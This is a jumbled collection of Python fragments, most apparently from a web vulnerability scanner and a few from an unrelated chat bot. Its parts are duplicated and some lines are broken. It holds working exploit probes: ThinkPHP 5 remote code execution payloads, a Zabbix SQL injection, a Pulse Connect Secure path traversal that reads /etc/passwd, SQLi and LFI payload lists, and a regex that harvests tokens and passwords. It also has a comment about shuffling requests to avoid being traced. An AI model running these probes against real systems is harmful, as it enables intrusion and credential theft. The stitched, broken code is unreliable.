def __init__(self, host):
self.urls = []
self.js = []
self.domain = ''
self.host = host
self.result = []
self.req = Requests()
def __init__(self, host):
self.links = []
self.urls = []
self.js = []
self.host = host
self.result = []
self.req = Requests()
def __init__(self, user_id, chat_id, peer_id, max_pred):
print("Actions init")
self.is_ban_or_kik = False
self.user_id = user_id
self.chat_id = chat_id
self.peer_id = peer_id
self.max_pred = max_pred
self.requests = Requests(peer_id, chat_id)
def __init__(self, ip):
self.url = ip
self.result = []
self.random = random.randint(100000000, 200000000)
self.win = 'set /a ' + str(self.random)
self.linux = 'echo ' + str(self.random)
self.timeout = 3
self.req = Requests()
def get_info(url):
try:
req = Requests()
url = url + '/solr/'
r = req.get(url)
if r.status_code is 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
return 'Apache Solr Admin leask: ' + url
except Exception:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
try:
url = url + '/solr/'
r = req.get(url)
if r.status_code is 200 and 'Solr Admin' in r.content and 'Dashboard' in r.content:
return 'Apache Solr Admin leask'
except Exception:
pass
def __init__(self, dbname, apps):
self.notstr = ''
self.apps = apps
self.notlen = ''
self.goto = ''
self.title = ''
self.dbname = dbname
self.outjson = []
self.req = Requests()
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
try:
r = req.get(url + payload)
if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text):
return 'thinkphp5_rce_1 | ' + url
except Exception as e:
pass
def __init__(self, dbname):
self.notstr = ''
self.notlen = ''
self.goto = ''
self.title = ''
self.dbname = dbname
self.ext = 'asp,php'
self.outjson = []
self.req = Requests()
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = r"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
try:
r = req.get(url + payload)
if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text):
return 'CVE-2016-10134 zabbix sqli:' + url
except Exception as e:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
try:
r = req.get(url + payload)
if 'root:x:0:0:root' in r.text:
return 'CVE-2019-11510 Pulse Connect Secure File | ' + url
except Exception as e:
pass
def get_info(url):
try:
req = Requests()
for i in path:
r = req.get(url + i)
if r.status_code == 200:
if '<title>phpinfo()' in r.text or 'php_version' in r.text:
return 'phpinfo leaks: ' + url + i
except:
pass
def get_info(url):
try:
req = Requests()
for i in path:
r = req.get(url + i)
if r.status_code == 200 and '<html>' not in r.text:
if not re.search(r'{"\w+":', r.text):
if verify(r.text):
return 'leaks : ' + url + i
except:
pass
def get_info(url):
try:
req = Requests()
for i in path:
r = req.get(url + i)
if r.status_code == 200 and '<html' not in r.text:
if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text):
if verify(r.text):
return 'leaks : ' + url + i
except:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers)
if random_num in r.text:
return 'thinkphp_5_0_23_rce | ' + url
except Exception as e:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = "//www.example.com"
try:
r = req.get(url + payload)
if r.is_redirect and 'www.example.com' in r.headers.get(
'Location'):
return 'Django < 2.0.8 任意URL跳转漏洞'
except Exception as e:
pass
def checkwaf(url):
try:
req = Requests()
r = req.get(url)
result = verify(r.headers, r.text[:10000])
if result == 'NoWAF':
for i in payload:
r = req.get(url + i)
result = verify(r.headers, r.text[:10000])
return result
except:
return 'NoWAF'
def __init__(self, update_object):
print("Controller init")
self.u = update_object
self.user = find_user(update_object['from_id'])
self.text = update_object['text']
self.command = self.payloadParse()
self.r = Requests(update_object['peer_id'])
self.payloadParse()
self.switchLevel(self.user.level)
def robots(url):
result = ''
try:
req = Requests()
r = req.get(url + '/robots.txt')
if r.status_code == 200 and '<html' not in r.text:
result = re.findall(r"/[\w\?\.=/]+/?", r.text)
if result:
return list(set(result))
except (UnboundLocalError, AttributeError):
pass
except Exception as e:
logging.exception(e)
def get_info(url):
try:
req = Requests()
for i in path:
r = req.get(url + i)
if r.status_code == 200:
if re.search(
r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd',
r.text, re.S):
if verify(r.text):
return 'Admin_Page : ' + url + i
elif r.status_code == 403:
return 'May be the login page : ' + url + i
except:
pass
class JsLeaks():
def __init__(self):
self.result = []
self.req = Requests()
def pool(self, urls):
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
result = {executor.submit(self.get_js, i): i for i in urls}
for future in concurrent.futures.as_completed(result, timeout=3):
future.result()
except (EOFError, concurrent.futures._base.TimeoutError):
pass
except Exception as e:
logging.exception(e)
return self.result
def verify(self, text):
result = True
for i in text:
if not re.search(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i):
result = False
break
return result
def get_js(self, url):
r = self.req.get(url)
regex = (
# 匹配url
r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b',
r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))',
# 匹配邮箱
r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
# 匹配token或者密码泄露
# 例如token = xxxxxxxx, 或者"apikey" : "xssss"
r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}',
# 匹配
r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)',
# 匹配 "/task/router" 这种路径
r'"(/\w{3,}/\w{3,})"',
# 匹配IP地址
r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
# 匹配云泄露
r'[\w]+\.cloudfront\.net',
r'[\w\-.]+\.appspot\.com',
r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
r'(storage\.cloud\.google\.com\/[\w\-.]+)',
r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
# 匹配手机号
r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}'
# 匹配域名
r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))'
)
for _ in regex:
text = re.findall(_, r.text[:100000], re.M | re.I)
if text is not None and self.verify(text):
text = list(map(lambda x: url + ' Leaks: ' + x, text))
self.result.extend(text)
def ipinfo(host):
out = []
if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
req = Requests()
try:
r = req.get(
'https://viewdns.info/iphistory/?domain={}'.format(host))
result = re.findall(
r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text,
re.S | re.I)
if result:
for i in result:
if iscdn(i):
out.append(i)
except:
pass
return out
def web_info(url):
host = parse_host(url)
ipaddr = parse_ip(host)
url = url.strip('/')
address = geoip(ipaddr)
wafresult = checkwaf(url)
req = Requests()
# noinspection PyBroadException
try:
r = req.get(url)
coding = chardet.detect(r.content).get('encoding')
r.encoding = coding
webinfo = WebPage(r.url, r.text, r.headers).info()
except Exception as e:
logging.exception(e)
webinfo = {}
if webinfo:
console('Webinfo', host, 'title: {}\n'.format(webinfo.get('title')))
console('Webinfo', host,
'Fingerprint: {}\n'.format(webinfo.get('apps')))
console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
else:
webinfo = {}
wafresult = 'None'
if iscdn(host):
osname = osdetect(host)
else:
osname = None
data = {
host: {
'WAF': wafresult,
'Ipaddr': ipaddr,
'Address': address,
'Webinfo': webinfo,
'OS': osname,
}
}
return data, webinfo.get('apps'), webinfo.get('title')
def checkwaf(url):
try:
req = Requests()
r = req.get(url)
result = verify(r.headers, r.text[:10000])
if result == 'NoWAF':
for i in payload:
r = req.get(url + i)
result = verify(r.headers, r.text[:10000])
if result != 'NoWAF':
return result
except UnboundLocalError:
pass
except Exception as e:
logging.exception(e)
host = parse_host(url)
if not iscdn(host):
return 'CDN IP'
return 'NoWAF'
def verify_https(url):
# 验证域名是http或者https的
# 如果域名是302跳转 则获取跳转后的地址
req = Requests()
url2 = parse.urlparse(url)
if url2.netloc:
url = url2.netloc
elif url2.path:
url = url2.path
# noinspection PyBroadException
try:
r = req.get('https://' + url)
getattr(r, 'status_code')
if r.status_code == 302 or r.status_code == 301:
r = req.get('https://' + 'www.' + url)
if r.status_code == 200:
return 'https://' + 'www.' + url
return 'https://' + url
except Exception as e:
# noinspection PyBroadException
try:
req.get('http://' + url)
return 'http://' + url
except Exception:
pass
def verify_https(url):
# 验证域名是http或者https的
# 如果域名是302跳转 则获取跳转后的地址
req = Requests()
# noinspection PyBroadException
if '://' in url:
try:
r = req.get(url)
return url
except Exception as e:
pass
host = parse_host(url)
url2 = parse.urlparse(url)
if url2.netloc:
url = url2.netloc
elif url2.path:
url = url2.path
# noinspection PyBroadException
try:
r = req.get('https://' + url)
getattr(r, 'status_code')
console('Verify', host, 'https://' + url + '\n')
return 'https://' + url
except AttributeError:
# noinspection PyBroadException
try:
req.get('http://' + url)
console('Verify', host, 'http://' + url + '\n')
return 'http://' + url
except Exception:
pass
except Exception as e:
logging.exception(e)
class SqlLfi():
def __init__(self):
self.result = []
self.req = Requests()
def sqli(self, qurl):
payload = {
"'", "%2527", "')", " AnD 7738=8291"
}
LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening',
'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl)
self.result.append(result)
raise Getoutofloop
for i in LFI_payload:
url = ''
lfi, pattern = i.split('|')
if re.search(r'=\w+\.\w{3}$', qurl):
url = re.sub(r'\w+\.\w{3}$', lfi, qurl)
elif re.search('=\w+', qurl):
url = re.sub(r'\w+$', lfi, qurl)
r = self.req.get(url)
if re.search(pattern, r.text, re.S):
self.result.append('LFI: {}'.format(url))
break
except:
pass
def pool(self, urls):
host = dedup_url(urls)
with concurrent.futures.ThreadPoolExecutor(
max_workers=30) as executor:
executor.map(self.sqli, host)
return self.result
def web_info(url):
host = parse_host(url)
ipaddr = parse_ip(host)
url = url.strip('/')
address = geoip(ipaddr)
wafresult = checkwaf(url)
req = Requests()
try:
r = req.get(url)
coding = chardet.detect(r.content).get('encoding')
r.encoding = coding
webinfo = WebPage(r.url, r.text, r.headers).info()
except Exception as e:
webinfo = {}
if webinfo:
console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title')))
console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
else:
webinfo = {}
wafresult = 'None'
if iscdn(host):
osname = osdetect(host)
else:
osname = None
pdns = virustotal(host)
reverseip = reverse_domain(host)
webinfo.update({"pdns": pdns})
webinfo.update({"reverseip": reverseip})
data = {
host: {
'WAF': wafresult,
'Ipaddr': ipaddr,
'Address': address,
'Webinfo': webinfo,
'OS': osname,
}
}
return data, webinfo.get('apps')
def __init__(self, dbname, apps, host, title):
self.dbname = dbname
self.apps = apps
self.title = title
self.headers = get_ua()
self.outjson = []
self.wordlist = []
self.host = host
self.urls = self.get_urls(self.host)
self.req = Requests()
# url请求随机顺序 避免溯源
random.shuffle(self.urls)
def checkwaf(url):
result = 'NoWAF'
host = parse_host(url)
if not iscdn(host):
return 'CDN IP'
try:
req = Requests()
r = req.get(url)
result = verify(r.headers, r.text)
if result == 'NoWAF':
for i in payload:
r = req.get(url + i)
result = verify(r.headers, r.text)
if result != 'NoWAF':
return result
else:
return result
except (UnboundLocalError, AttributeError):
pass
except Exception as e:
logging.exception(e)
